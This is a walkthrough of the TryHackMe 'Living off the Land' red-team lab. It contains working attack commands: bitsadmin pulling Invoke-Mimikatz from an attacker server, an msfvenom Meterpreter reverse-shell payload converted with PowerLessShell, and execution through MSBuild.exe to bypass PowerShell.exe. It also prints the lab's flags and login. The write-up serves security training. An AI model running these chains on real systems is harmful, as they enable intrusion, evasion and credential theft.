TL;DR Walkthrough of the TryHackMe Living off the Land room, part of the Red Team Pathway.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
Living off the Land is one of the rooms in the THM Red Team Pathway that piqued my interest, so I figured I’d post my notes on it. I’m also a big fan of using builtin tools.
Warmup questions
Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?
Pktmon.exe
Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?
T1127.001
Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?
Execute
BITSAdmin
Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?
#Host files on Kali
cd /home/kali/Downloads/exploits/PowerShell
python3 -m http.server 9000
#Download the file on the Windows victim VM
bitsadmin.exe /transfer /Download /priority Foreground http://10.6.36.88:9000/Invoke-Mimikatz.ps1 c:\Users\thm\Desktop\Invoke-Mimikatz.ps1enc_thm_0YmFiOG_file.txt
What is the file content?
Set-Location C:\Users\thm\Desktop
certutil -decode .\enc_thm_0YmFiOG_file.txt .\payload.txt
Get-Content .\payload.txtTHM{ea4e2b9f362320d098635d4bab8a568e}
PowerShell reverse shell without PowerShell.exe
Replicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?
#Generate an obfuscated PS1 reverse shell
cd /home/kali/Downloads/exploits/PowerShell
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=10.6.36.88 LPORT=4443 -f psh-reflection > liv0ff.ps1
#Download PowerLessShell & convert the PS1 to csproj
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
find / -name "PowerLessShell.py" 2>/dev/null
cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python2 /home/kali/Downloads/exploits/PowerShell/PowerLessShell/PowerLessShell.py -type powershell -source ../liv0ff.ps1 -output liv0ff.csproj
You will want to run PowerLessShell.py from the specified directory, otherwise you will likely get an odd error that looks like the below.
Open two new BASH tabs. In one:
cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python3 -m http.server 9000In the other tab:
msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost 10.6.36.88;set lport 4443;exploit”In the original tab:
xfreerdp /v:10.10.248.89 /u:thm /p:TryHackM3
#On the victim Windows VM
Invoke-WebRequest http://10.6.36.88:9000/liv0ff.csproj -OutFile C:\Users\thm\Desktop\livOff.csproj
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj
Catch the reverse shell in Meterpreter and read the file.
THM{23005dc4369a0eef728aa39ff8cc3be2}
Summary
We demonstrated just a couple of the ways out there to run PowerShell without PowerShell.exe here.
We say it all the time; “focus on the privilege, not the tool”. The attacker will just find a different TTP if you spend all your time blocking specific tools. Don’t let the attacker get privileges and it won’t matter what tool they use.
Cybersecurity is ultimately all about Identity and Access Management.
References
How to find files in BASH: https://www.cyberciti.biz/faq/search-for-files-in-bash/
Suppress errors while searching in BASH: https://linuxhint.com/two-dev-null-command-purpose/
PowerShellLess on GitHub: https://github.com/Mr-Un1k0d3r/PowerLessShell
